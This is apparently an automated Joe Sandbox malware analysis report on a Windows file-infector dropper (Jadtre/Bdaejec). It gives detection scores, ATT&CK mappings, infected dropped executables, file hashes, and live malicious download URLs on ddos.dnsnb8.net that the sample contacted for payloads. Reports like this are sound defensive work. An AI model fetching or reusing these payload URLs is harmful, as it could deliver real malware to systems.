Code function: 1_2_002CB21D __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,

1_2_002CB21D

Source: C:\Users\user\Desktop\BXOZIGZEUa.exe

1_2_001CE757

Source: JdEV.exe, 00000003.00000003.1379761142.0000000001241000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\Program Files\Windows Defender\MsMpEng.exe
Source: Amcache.hve.3.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.3.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.3.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.3.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.3.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Bdaejec

Source: Yara match

File source: Process Memory Space: JdEV.exe PID: 7800, type: MEMORYSTR

Remote Access Functionality

Yara detected Bdaejec

Source: Yara match

File source: Process Memory Space: JdEV.exe PID: 7800, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Native API	1 DLL Side-Loading	1 Access Token Manipulation	11 Masquerading	31 Input Capture	12 System Time Discovery	1 Taint Shared Content	31 Input Capture	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	2 Process Injection	1 Access Token Manipulation	LSASS Memory	1 Query Registry	Remote Desktop Protocol	1 Archive Collected Data	11 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	2 Process Injection	Security Account Manager	131 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	12 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	12 Software Packing	Cached Domain Credentials	3 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	23 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
BXOZIGZEUa.exe	95%	ReversingLabs	Win32.Virus.Jadtre
BXOZIGZEUa.exe	88%	Virustotal		Browse
BXOZIGZEUa.exe	100%	Avira	W32/Jadtre.B
BXOZIGZEUa.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	100%	Avira	W32/Jadtre.B
C:\Users\user\AppData\Local\Temp\JdEV.exe	100%	Avira	TR/Dldr.Small.Z.haljq
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Avira	W32/Jadtre.B
C:\Program Files\7-Zip\Uninstall.exe	100%	Avira	W32/Jadtre.B
C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\JdEV.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Joe Sandbox ML
C:\Program Files\7-Zip\Uninstall.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\JdEV.exe	97%	ReversingLabs	Win32.Trojan.Skeeyah

Source	Detection	Scanner	Label
http://ddos.dnsnb8.net:799/cj//k1.rarL	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k2.rarCHITECTURE=x86PROCESS	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net/$3	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k1.rar;	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k1.rarD	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k1.rarDC:	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k2.raro	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k2.rarY	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k1.rars	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k2.rar	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k2.rar-	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k2.rarx	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k2.rars	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net/j&a	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k1.rar$	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net/x&	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k2.rarQ	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k2.rarL	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net/	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ddos.dnsnb8.net	44.221.84.105	true	false		high
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ddos.dnsnb8.net:799/cj//k2.rar	true	Avira URL Cloud: malware	unknown
http://ddos.dnsnb8.net:799/cj//k1.rar	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://ddos.dnsnb8.net:799/cj//k2.rarY	JdEV.exe, 00000003.00000002.1613503596.0000000001223000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ddos.dnsnb8.net:799/cj//k2.rarCHITECTURE=x86PROCESS	JdEV.exe, 00000003.00000002.1613503596.00000000011CE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ddos.dnsnb8.net:799/cj//k1.rar;	JdEV.exe, 00000003.00000003.1379761142.0000000001223000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.scintilla.org/scite.rng	SciTE.exe.3.dr	false		high
http://www.rftp.comJosiah	SciTE.exe.3.dr	false		high
http://www.activestate.com	SciTE.exe.3.dr	false		high
http://www.activestate.comHolger	SciTE.exe.3.dr	false		high
http://ddos.dnsnb8.net/$3	JdEV.exe, 00000003.00000002.1613503596.0000000001263000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ddos.dnsnb8.net:799/cj//k1.rars	JdEV.exe, 00000003.00000003.1379761142.00000000011CE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE	JdEV.exe, 00000003.00000003.1360033401.00000000014D0000.00000004.00001000.00020000.00000000.sdmp, JdEV.exe, 00000003.00000002.1613273850.0000000000343000.00000002.00000001.01000000.00000004.sdmp	false		high
http://upx.sf.net	Amcache.hve.3.dr	false		high
http://www.rftp.com	SciTE.exe.3.dr	false		high
http://ddos.dnsnb8.net:799/cj//k1.rarL	JdEV.exe, 00000003.00000003.1379761142.0000000001223000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ddos.dnsnb8.net:799/cj//k2.raro	JdEV.exe, 00000003.00000002.1613503596.0000000001223000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.baanboard.comBrendon	SciTE.exe.3.dr	false		high
http://ddos.dnsnb8.net:799/cj//k1.rarDC:	JdEV.exe, 00000003.00000003.1379761142.0000000001241000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.smartsharesystems.com/	SciTE.exe.3.dr	false		high
http://ddos.dnsnb8.net:799/cj//k1.rarD	JdEV.exe, 00000003.00000003.1379761142.0000000001223000.00000004.00000020.00020000.00000000.sdmp, JdEV.exe, 00000003.00000002.1613503596.0000000001223000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.scintilla.org	SciTE.exe.3.dr	false		high
http://www.spaceblue.comMathias	SciTE.exe.3.dr	false		high
http://ddos.dnsnb8.net:799/cj//k2.rar-	JdEV.exe, 00000003.00000002.1613503596.0000000001223000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.smartsharesystems.com/Morten	SciTE.exe.3.dr	false		high
http://ddos.dnsnb8.net:799/cj//k2.rarx	JdEV.exe, 00000003.00000002.1613503596.0000000001223000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ddos.dnsnb8.net:799/cj//k2.rars	JdEV.exe, 00000003.00000002.1613503596.00000000011CE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ddos.dnsnb8.net/j&a	JdEV.exe, 00000003.00000003.1379761142.00000000011CE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.develop.com	SciTE.exe.3.dr	false		high
http://www.lua.org	SciTE.exe.3.dr	false		high
http://ddos.dnsnb8.net/x&	JdEV.exe, 00000003.00000003.1379761142.00000000011CE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ddos.dnsnb8.net/	JdEV.exe, 00000003.00000003.1379761142.00000000011CE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.spaceblue.com	SciTE.exe.3.dr	false		high
http://www.baanboard.com	SciTE.exe.3.dr	false		high
http://www.develop.comDeepak	SciTE.exe.3.dr	false		high
http://ddos.dnsnb8.net:799/cj//k2.rarQ	JdEV.exe, 00000003.00000002.1613503596.0000000001223000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ddos.dnsnb8.net:799/cj//k1.rar$	JdEV.exe, 00000003.00000003.1379761142.0000000001223000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ddos.dnsnb8.net:799/cj//k2.rarL	JdEV.exe, 00000003.00000002.1613503596.0000000001223000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
44.221.84.105	ddos.dnsnb8.net	United States		14618	AMAZON-AESUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1585133
Start date and time:	2025-01-07 06:00:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 4s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	BXOZIGZEUa.exe renamed because original name is a hash value
Original Sample Name:	8f5469d96f148afd08a0f693684f9bb0195a5291eb2437214c01465b463acbf8.exe
Detection:	MAL
Classification:	mal66.spre.troj.evad.winEXE@7/16@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 89% Number of executed functions: 43 Number of non-executed functions: 346
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.168.117.173, 13.107.246.45, 40.126.32.68, 20.109.210.53
Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
00:01:36	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
44.221.84.105	PO_2024_056209_MQ04865_ENQ_1045.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	bumxkqgxu.biz/vnlfrtbjm
	ArjM1qx3hV.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k1.rar
	aRxo3E278B.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k1.rar
	yRc7UfFif9.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k1.rar
	gT6IitwToH.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k1.rar
	REQUEST FOR QUOTATION 1307-RFQ.exe	Get hash	malicious	MassLogger RAT	Browse	saytjshyf.biz/xoqfqirqhp
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	npukfztj.biz/edmrjb
	http://setup.ghwr87ytiuwhgf4ihsjdnbbdvsh.com	Get hash	malicious	Unknown	Browse	setup.ghwr87ytiuwhgf4ihsjdnbbdvsh.com/favicon.ico
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	saytjshyf.biz/eglmpsrvxnyx
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	saytjshyf.biz/peioi

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s-part-0017.t-0009.t-msedge.net	w3245.exe	Get hash	malicious	Unknown	Browse	13.107.246.45
	w3245.exe	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://app.saner.ai/shared/notes/7353e5ae-dd5f-410b-92c3-210c9e88052a	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	Jeffparish.docx	Get hash	malicious	Unknown	Browse	13.107.246.45
	AllItems.htm	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	Vernales Restaurant-encrypted.pdf	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	https://sign.zoho.com/zsguest?locale=en&sign_id=234b4d535f4956235d3ed2bb80da1204238e412cdfe561cf1e7cff409a79a97da8a2d431ccef9065ebae57f03416d61f0971abb897fde199a21f0da5d9085251df31eb6747d99920190103a51a045e3e309308fa5f3a1ca3&action_type=SIGN	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	https://scales.mn/file/one-drv11.html	Get hash	malicious	Unknown	Browse	13.107.246.45
	http://click.pstmrk.it	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://www.figma.com/design/Sw6t5vElBVmnrFNiteka8B/Untitled-(Copy)?node-id=0-1&p=f&t=x9aFU3FgLH1rkKBK-0	Get hash	malicious	Unknown	Browse	13.107.246.45
ddos.dnsnb8.net	ArjM1qx3hV.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	aRxo3E278B.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	yRc7UfFif9.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	gT6IitwToH.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	#U65b0#U7248#U7f51#U5173.exe	Get hash	malicious	Bdaejec, Neshta, Ramnit	Browse	44.221.84.105
	#U8865#U4e01#U6253#U5305.exe	Get hash	malicious	Bdaejec, Neshta, Ramnit	Browse	44.221.84.105
	#U65b0#U7248#U7f51#U5173Srv.exe	Get hash	malicious	Bdaejec, Neshta, Ramnit	Browse	44.221.84.105
	gE4NVCZDRk.exe	Get hash	malicious	Bdaejec, RunningRAT	Browse	44.221.84.105
	ib.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-AESUS	https://u896278.ct.sendgrid.net/ls/click?upn=u001.qpi-2F0q-2FpcJZ7AGoG9N-2BrxLxoGn8scq-2BedBfmGHFAiwRCk-2Fciku7nsS3YfQMNNJI09mLo_nYx4-2F6dkZkjW10KMIp5mXhxys1ng1sBiI-2Bi9ROMYt6d5xhIh5rIqEUIaIxVHh8-2Ftz-2FouCgfXZk6mMUe2uKm92SOgBLlBdhjnRJuhENZnIuGoEoPqnROi7OCzdabJBBnGjEwd2iK-2BngR2RyIIgM3XrJQ7wQhHrfqScifSW3iAsv3H5nGFK9ntcSdChvkxj0yXdE-2FQ0ICDszl57i6aZSB-2Fow-3D-3D	Get hash	malicious	Unknown	Browse	3.233.158.25
	https://report-scam.malwarebouncer.com/XcUR2TnV2VTlXT0s0Z0NYa01KSGt3dUtWMWNiblBrc29mMlpZUU1WdThBSjdDdTlRQTVDV1ZZd0pDeWRmUU5rQ1QvVDNiSlBNYWd2bTd0eTRkZW5jT0hrYTBKWHFiVUc4TVZBOGpiNkh4VG9OTm9zNTVUWHNmNWVydHpqbzhIc1llSzdzTHZ0dENVNWRLZy9BbCsyVDRMSGRHOThUWnV5QUxPU0RZL1dPalNYTmUzMTVoRzl5bmk1ZVZRPT0tLUdVYnJkMC9GazI3MWlxYmotLUpFOURyOWkzK1l6Vy9BYTVOVDBVNkE9PQ==?cid=2346401253	Get hash	malicious	KnowBe4	Browse	52.55.210.33
	x86_64.elf	Get hash	malicious	Mirai	Browse	54.86.71.160
	arm5.elf	Get hash	malicious	Mirai	Browse	107.22.157.131
	spc.elf	Get hash	malicious	Mirai	Browse	54.136.161.121
	sh4.elf	Get hash	malicious	Mirai	Browse	107.23.89.175
	m68k.elf	Get hash	malicious	Mirai	Browse	34.236.109.145
	arm4.elf	Get hash	malicious	Mirai	Browse	52.90.71.108
	mpsl.elf	Get hash	malicious	Mirai	Browse	44.200.217.194
	https://app.saner.ai/shared/notes/7353e5ae-dd5f-410b-92c3-210c9e88052a	Get hash	malicious	HTMLPhisher	Browse	3.81.241.106

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\JdEV.exe	ArjM1qx3hV.exe	Get hash	malicious	Bdaejec	Browse
	aRxo3E278B.exe	Get hash	malicious	Bdaejec	Browse
	yRc7UfFif9.exe	Get hash	malicious	Bdaejec	Browse
	gT6IitwToH.exe	Get hash	malicious	Bdaejec	Browse
	#U65b0#U7248#U7f51#U5173.exe	Get hash	malicious	Bdaejec, Neshta, Ramnit	Browse
	#U8865#U4e01#U6253#U5305.exe	Get hash	malicious	Bdaejec, Neshta, Ramnit	Browse
	#U65b0#U7248#U7f51#U5173Srv.exe	Get hash	malicious	Bdaejec, Neshta, Ramnit	Browse
	gE4NVCZDRk.exe	Get hash	malicious	Bdaejec, RunningRAT	Browse
	ib.exe	Get hash	malicious	Bdaejec	Browse
	SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Get hash	malicious	Bdaejec	Browse

Created / dropped Files

C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\JdEV.exe
File Type:	MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19456
Entropy (8bit):	6.5908093222053585
Encrypted:	false
SSDEEP:	384:1FuSuXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:vqQGPL4vzZq2o9W7GsxBbPr
MD5:	51111F182D4F0EAC7373F27A9F9E9218
SHA1:	756D557FF1771C82F2EB77813FA1C906146C0882
SHA-256:	ACBBF8743A45715724FD6E22C5551B13DB06915658934EBD9D76BAC0C4E12C1E
SHA-512:	515242B4B65E9FE775B7CA5F83514598C2D79AD2E41FC8CF56971FDFD1F8E2FB647ED822F3F0BC319885D507C8E418E8CFBA84E2F56F5D8BB9B9FF3C051D4E01
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ..........................................................@...PE..L....................................0............................................................................................... ..l...........................................................................................................PELIB...............................`....rsrc........ ......................@..@..Y\|.uR..P...0...B.................. ...................................................................................j.h"...h....j...(....Hello World!.MyProg........................................................................................................................................................................................................................(...........0...(.......................;.......User32.dll...MessageBoxA................................................................................................dummy.exe.....................TestExport.CallPlz................

C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\JdEV.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2389504
Entropy (8bit):	6.731341679292559
Encrypted:	false
SSDEEP:	49152:BGSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL:V4OEtwiICvYMpf
MD5:	F8B6911C0F07C2D33AEFCA1C460DC739
SHA1:	04E31D2444A6D09B5751C0058A6C6E778086FBF6
SHA-256:	C023BA9B0DDAB2F70299B10A77DE2E65F38B1EE44374256564948AE2EE1CBBE0
SHA-512:	5A8FFA086E573E2475A1D8C1F929051A0EBA31326691000C9F062ADEAE8DB7BE33D92767A90ADF375B6F9F2BA0350DE00BEF85D6F1CC04F415FA1A62B65AB225
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~.......p$...........@...........................$...........@.........................p...<............@ ......................P#.....@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@..B.....u...P...p$..B...4$............. ...........................................................................................................................................................................................................................................................

C:\Program Files\7-Zip\Uninstall.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\JdEV.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	31744
Entropy (8bit):	6.366383934301566
Encrypted:	false
SSDEEP:	768:uWQ3655Kv1X/qY1MSdiRQGPL4vzZq2o9W7GsxBbPr:uHqaNrFdiWGCq2iW7z
MD5:	C1F7D7BAC6B1A4852A5213295E0CA54F
SHA1:	6BFB881AF5336F9D33DAB770A2E6BB9D25BDA5E6
SHA-256:	3A4CC784C554665C0C85907B63D920DF1C7CDA4255EB3E08ED2D22F874103A72
SHA-512:	62BE725E5F8A7C30A889A4F0739EC46207F8067E43E6C8FE1154F8411E641B3F07EF75148B3DDCB59D782291D21819879996B9DC67687778C5B00C0E0491B4AB
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../......V...@.......p.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc........`.......*..............@..@.EpN.uZ..P...p...B...:.............. ...................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_JdEV.exe_cd8f4618334c72b9a4dd6cfe872fc24dcdd0ad_684e5ed5_1f862b9f-9f84-4862-8f2a-e2d1585e962a\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9841408264427419
Encrypted:	false
SSDEEP:	192:BnNoxvi6UI0fyRmgf63j8/h9zuiFcgZ24IO8erB6:BOxvi6Ujf8mw63jgzuiFcgY4IO8erB
MD5:	01007032CB861D1325D94F906225347B
SHA1:	EB0FFD64C30171368621B876934A64F8FAEF1B1A
SHA-256:	CBFDA3F1DFA9314C049669284A57C21A5B82B379089227A3806EAC1B5494BF57
SHA-512:	85F563BB9B300B9FA0E122904F15201A01D73AD74019903A77E6053B0F122AED94970878017A30E73662A736560113060C3DC8212396B4DF69E947030C37144D
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.6.9.9.6.7.8.0.2.0.5.6.7.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.6.9.9.6.7.9.1.6.1.1.9.3.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.f.8.6.2.b.9.f.-.9.f.8.4.-.4.8.6.2.-.8.f.2.a.-.e.2.d.1.5.8.5.e.9.6.2.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.b.1.7.e.c.a.c.-.1.2.5.5.-.4.1.1.3.-.8.8.2.d.-.5.1.b.3.b.8.d.7.6.a.b.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.J.d.E.V...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.7.8.-.0.0.0.1.-.0.0.1.3.-.4.0.b.3.-.8.2.2.b.c.1.6.0.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.2.4.d.b.6.7.8.b.c.8.d.1.6.8.1.4.c.0.e.8.0.0.3.e.d.4.1.4.d.c.2.0.0.0.0.f.f.f.f.!.0.0.0.0.9.9.e.e.3.1.c.d.4.b.0.d.6.a.4.b.6.2.7.7.9.d.a.3.6.e.0.e.e.e.c.d.d.8.0.5.8.9.f.c.!.J.d.E.V...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.3././.1.1.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD00E.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Tue Jan 7 05:01:18 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	169128
Entropy (8bit):	1.761960533477816
Encrypted:	false
SSDEEP:	768:8YIW/mtBttDL7/mc8vvC2tH8fy3Gd+n+g:8A/mO5KC8fyNn+g
MD5:	7BE23ECA26B4C54E274E3F8704C6290B
SHA1:	7B9CC88C18A22A66949F297A0A6CC8B207BEEE49
SHA-256:	A6861C6CBFA55B137C1562D1764D5773A2F5A02CC5640819C7A21D942EF15A2F
SHA-512:	D490EDBD22D1B47EDDB3CB45C163A91F0FE91360A69A8ECC7D1CC01D36A3321B79E8805E201653ADC20ACD5FBB86A96C86DA9B173965F35884D3DE08825B1433
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .........\|g............t.......................<...,!......t....Q..........`.......8...........T...........@>..hV..........h!..........T#..............................................................................eJ.......#......GenuineIntel............T.......x.....\|g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD167.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
